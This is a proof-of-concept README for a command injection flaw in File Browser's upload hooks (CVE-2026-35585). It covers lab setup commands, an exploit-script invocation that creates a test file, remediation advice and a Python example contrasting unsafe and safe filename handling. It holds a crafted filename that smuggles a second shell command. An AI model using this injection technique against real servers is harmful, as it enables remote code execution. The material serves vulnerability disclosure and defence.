## https://sploitus.com/exploit?id=A1A3EA14-8448-57BF-B35B-59AA7674CEDB
# CVE-2026-35585: File Browser OS Command Injection PoC
## Description
This repository contains a Proof of Concept (PoC) for **CVE-2026-35585**, a critical OS Command Injection vulnerability discovered in **File Browser** (versions 2.0.0 through 2.33.1).
The vulnerability exists in the "Custom Command Hooks" feature. Due to insufficient sanitization of environment variables (such as `$FILE` or `$USERNAME`) during shell execution, an authenticated user with file upload privileges can execute arbitrary commands on the host system by crafting a malicious filename.
**Discovered by:** saku0512 (https://github.com/Saku0512)
---
## ⚠️ Disclaimer
**This project is for educational and ethical security testing purposes only.**
The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.
---
## Vulnerability Details
- **CVE ID:** CVE-2026-35585
- **Type:** OS Command Injection (CWE-78)
- **Impact:** Remote Code Execution (RCE)
- **Affected Versions:** v2.0.0 <= File Browser <= v2.33.1
- **Fixed Version:** v2.33.8
### Root Cause
File Browser allows administrators to set up hooks (e.g., "After Upload"). When these hooks are triggered, the application executes a shell command and replaces variables like `$FILE` with the actual filename. If a filename contains shell metacharacters (e.g., `;`, `&`, `|`), they are executed by the system shell without proper escaping.
---
## Proof of Concept (Usage)
This section describes how to reproduce the Remote Code Execution (RCE) using the provided environment and exploit script.
### 1. Environment Setup
Deploy the vulnerable environment (File Browser v2.33.1) using Docker Compose:
```bash
# Ensure the data directory has the correct permissions
mkdir -p data && sudo chown -R 1000:1000 data
docker compose up -d
```
### 2. Configuration (Target Environment)
To trigger the vulnerability, a shell-based hook must be configured. Since SQLite might lock the database while the container is running, we recommend the following "offline" configuration method:
```bash
# 1. Stop the running container to release the database lock
docker compose stop
# 2. Configure settings using a temporary container
# Set shell to "sh -c"
docker run --rm -v "$(pwd)/data:/database" filebrowser/filebrowser:v2.33.1 /bin/filebrowser config set --shell "sh -c" --database /database/filebrowser.db
# Add an After Upload command
docker run --rm -v "$(pwd)/data:/database" filebrowser/filebrowser:v2.33.1 /bin/filebrowser cmds add after_upload 'echo Uploaded: $FILE' --database /database/filebrowser.db
# Reset admin password to "admin"
docker run --rm -v "$(pwd)/data:/database" filebrowser/filebrowser:v2.33.1 /bin/filebrowser users update admin --password admin --database /database/filebrowser.db
# 3. Restart the container
docker compose start
```
### 3. Execution of Exploit
Run the `exploit.py` script to automate the login and malicious file upload. The following command attempts to create a file named `pwned_rce_test` in the `/tmp` directory of the container.
```bash
# Install dependencies
pip install requests
# Run the exploit
python3 exploit.py -t http://localhost:8080 -u admin -p admin -c "touch /tmp/pwned_rce_test"
```
### 4. Verification
Verify that the command was executed successfully by checking for the existence of the file inside the container:
```bash
docker exec -it cve-2026-35585-vuln-app ls -l /tmp/pwned_rce_test
```
If the file exists, the RCE is confirmed.
---
## Remediation
Update File Browser to **version 2.33.8** or later.
In the patched version, the hook functionality is disabled by default, and variable expansion is handled more securely.
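The Root Cause section above and this remediation note describe one pattern: substituting `$FILE` textually into the hook command string hands the filename to the shell as code, whereas passing it as data lets the shell expand it without re-parsing it. The following Python example is added here and is not code from this PoC repository or from File Browser itself; it shows the unsafe substitution (tokenised the way `sh` would parse it, not executed), the safer pattern of handing the filename to `sh -c` through the environment, and a simple metacharacter check a defender can run on upload names or an audit trail. All function names are hypothetical and the sample filenames are constructed.

```python
"""Added example (not part of the PoC repository or of File Browser):
textual substitution of a filename into a shell command versus passing it
to the shell as an environment variable. Names here are hypothetical."""
from __future__ import annotations

import os
import shlex
import subprocess

# Characters that change how `sh -c` parses a command line (assumed list).
SHELL_METACHARS = set(";&|`$(){}<>\n\"'\\*?[]!")


def filename_shell_risk(name: str) -> set[str]:
    """Return the shell metacharacters present in a filename.
    An empty set means the name is inert as shell text. Usable as an
    upload-time check or for scanning a list of uploaded names."""
    return {ch for ch in name if ch in SHELL_METACHARS}


def vulnerable_hook_command(template: str, filename: str) -> str:
    """Naive textual substitution: the filename becomes part of the text the
    shell parses, so any operator inside it is honoured as an operator."""
    return template.replace("$FILE", filename)


def shell_tokens(command: str) -> list[str]:
    """Tokenise a command line as a POSIX shell would, returning operators
    such as ';' and '|' as their own tokens. Only shows the parse; nothing
    is executed."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def safe_hook_invocation(template: str, filename: str) -> tuple[list[str], dict[str, str]]:
    """Leave the template untouched and deliver the filename through the
    shell's environment. The shell expands $FILE as a parameter value and
    never re-parses that value for operators or command substitutions."""
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"), "FILE": filename}
    return ["sh", "-c", template], env


def run_safe_hook(template: str, filename: str) -> str:
    """Run the hook the safe way and return its stdout (trailing newline removed)."""
    argv, env = safe_hook_invocation(template, filename)
    result = subprocess.run(argv, env=env, capture_output=True, text=True, check=True)
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    # The hook template from the advisory setup; sample names are constructed.
    # The second name carries the ';' the root cause describes; it only echoes.
    template = "echo Uploaded: $FILE"
    for name in ["photo.jpg", "photo.jpg; echo injected"]:
        print("risk:", filename_shell_risk(name) or "none")
        print("vulnerable parse:", shell_tokens(vulnerable_hook_command(template, name)))
        print("safe output:", run_safe_hook(template, name))
```

With the second sample name, the substituted string tokenises as `echo Uploaded: photo.jpg ; echo injected`, i.e. two commands, while the environment-based invocation prints the whole name as a single line of output. Two caveats apply to the safe pattern: the template is still shell code, so it must come only from an administrator, and an unquoted `$FILE` is subject to word splitting and pathname globbing, so hook templates should be written as `"$FILE"`.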
---
## References
- [CVE-2026-35585 (vulners.com)](https://vulners.com/cve/CVE-2026-35585)
- [Official GitHub Advisory](https://github.com/filebrowser/filebrowser/security/advisories/GHSA-jvpw-637p-h3pw)